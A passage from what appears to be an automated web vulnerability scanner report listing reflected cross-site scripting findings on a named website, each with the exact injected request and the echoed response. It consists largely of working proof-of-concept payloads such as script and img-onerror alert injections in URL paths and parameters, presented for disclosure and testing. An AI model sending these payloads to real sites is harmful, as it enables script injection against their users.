User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /browsepr.php7c50d<script>alert(1)</script>ce0c6152c85a330f6?pr=5&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.445. http://www.resellerbase.com/browsepr.php [pr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as text between TITLE tags. The payload 27461</title><img%20src%3da%20onerror%3dalert(1)>bcdbf3d81ab was submitted in the pr parameter. This input was echoed as 27461</title><img src=a onerror=alert(1)>bcdbf3d81ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browsepr.php?pr=827461</title><img%20src%3da%20onerror%3dalert(1)>bcdbf3d81ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 827461</title><img src=a onerror=alert(1)>bcdbf3d81ab</title>
...[SNIP]...

2.446. http://www.resellerbase.com/browsepr.php [pr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as plain text between tags. The payload 31a6b<img%20src%3da%20onerror%3dalert(1)>6c1c3dd19c2 was submitted in the pr parameter. This input was echoed as 31a6b<img src=a onerror=alert(1)>6c1c3dd19c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browsepr.php?pr=831a6b<img%20src%3da%20onerror%3dalert(1)>6c1c3dd19c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 831a6b
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [PR : 831a6b<img src=a onerror=alert(1)>6c1c3dd19c2]</td>
...[SNIP]...

2.447. http://www.resellerbase.com/browsepr.php [pr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as plain text between tags. The payload d0ec7<img%20src%3da%20onerror%3dalert(1)>ecfd128cc1ef61bbf was submitted in the pr parameter. This input was echoed as d0ec7<img src=a onerror=alert(1)>ecfd128cc1ef61bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php?pr=5d0ec7<img%20src%3da%20onerror%3dalert(1)>ecfd128cc1ef61bbf&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 5d0ec7
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [PR : 5d0ec7<img src=a onerror=alert(1)>ecfd128cc1ef61bbf]</td>
...[SNIP]...

2.448. http://www.resellerbase.com/browsepr.php [pr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The value of the pr request parameter is copied into the HTML document as text between TITLE tags. The payload e62fb</title><img%20src%3da%20onerror%3dalert(1)>421989210ddb81ef7 was submitted in the pr parameter. This input was echoed as e62fb</title><img src=a onerror=alert(1)>421989210ddb81ef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /browsepr.php?pr=5e62fb</title><img%20src%3da%20onerror%3dalert(1)>421989210ddb81ef7&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 5e62fb</title><img src=a onerror=alert(1)>421989210ddb81ef7</title>
...[SNIP]...

2.449. http://www.resellerbase.com/cgi-bin/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /cgi-bin/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e014<script>alert(1)</script>8aa3df60110 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin1e014<script>alert(1)</script>8aa3df60110/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /cgi-bin1e014<script>alert(1)</script>8aa3df60110/ was not found on this server.</p>
...[SNIP]...

2.450. http://www.resellerbase.com/communication/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7d36<script>alert(1)</script>e32156eaf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione7d36<script>alert(1)</script>e32156eaf07/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione7d36<script>alert(1)</script>e32156eaf07/ was not found on this server.</p>
...[SNIP]...

2.451. http://www.resellerbase.com/communication/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a10e<script>alert(1)</script>63c796b5737f1a7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication6a10e<script>alert(1)</script>63c796b5737f1a7b/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication6a10e<script>alert(1)</script>63c796b5737f1a7b/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.452. http://www.resellerbase.com/communication/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8fa67<script>alert(1)</script>06b38c1848d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/?8fa67<script>alert(1)</script>06b38c1848d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/?8fa67<script>alert(1)</script>06b38c1848d=1 was not found on this server.</p>
...[SNIP]...

2.453. http://www.resellerbase.com/communication/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload c0379<a>421c78b5937 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fc0379<a>421c78b5937 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fc0379<a>421c78b5937 was not found on this server.</p>
...[SNIP]...

2.454. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f11c<script>alert(1)</script>77838febb8138d171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication7f11c<script>alert(1)</script>77838febb8138d171/broadband/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7f11c<script>alert(1)</script>77838febb8138d171/broadband/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.455. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd8d9<script>alert(1)</script>5382a1faec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationfd8d9<script>alert(1)</script>5382a1faec0/broadband/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationfd8d9<script>alert(1)</script>5382a1faec0/broadband/ was not found on this server.</p>
...[SNIP]...

2.456. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce98d<script>alert(1)</script>39d0b8f891d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandce98d<script>alert(1)</script>39d0b8f891d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandce98d<script>alert(1)</script>39d0b8f891d/ was not found on this server.</p>
...[SNIP]...

2.457. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b720b<script>alert(1)</script>97d5da902a738ed60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/broadbandb720b<script>alert(1)</script>97d5da902a738ed60/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandb720b<script>alert(1)</script>97d5da902a738ed60/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.458. http://www.resellerbase.com/communication/broadband/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ec24b<script>alert(1)</script>0fff1cad6af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/?ec24b<script>alert(1)</script>0fff1cad6af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/?ec24b<script>alert(1)</script>0fff1cad6af=1 was not found on this server.</p>
...[SNIP]...

2.459. http://www.resellerbase.com/communication/broadband/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 7b3d9<a>d1fb6b54770 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f7b3d9<a>d1fb6b54770 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f7b3d9<a>d1fb6b54770 was not found on this server.</p>
...[SNIP]...

2.460. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c72<script>alert(1)</script>855f7143ff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication47c72<script>alert(1)</script>855f7143ff7/broadband/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication47c72<script>alert(1)</script>855f7143ff7/broadband/googlepr.php was not found on this server.</p>
...[SNIP]...

2.461. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9683a<script>alert(1)</script>8b5797cf64b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband9683a<script>alert(1)</script>8b5797cf64b/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband9683a<script>alert(1)</script>8b5797cf64b/googlepr.php was not found on this server.</p>
...[SNIP]...

2.462. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d460<script>alert(1)</script>f2be579353f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/googlepr.php1d460<script>alert(1)</script>f2be579353f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php1d460<script>alert(1)</script>f2be579353f was not found on this server.</p>
...[SNIP]...

2.463. http://www.resellerbase.com/communication/broadband/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload a0a42<a>e9df8fa8e68 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/googlepr.php?link_id=16a0a42<a>e9df8fa8e68 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
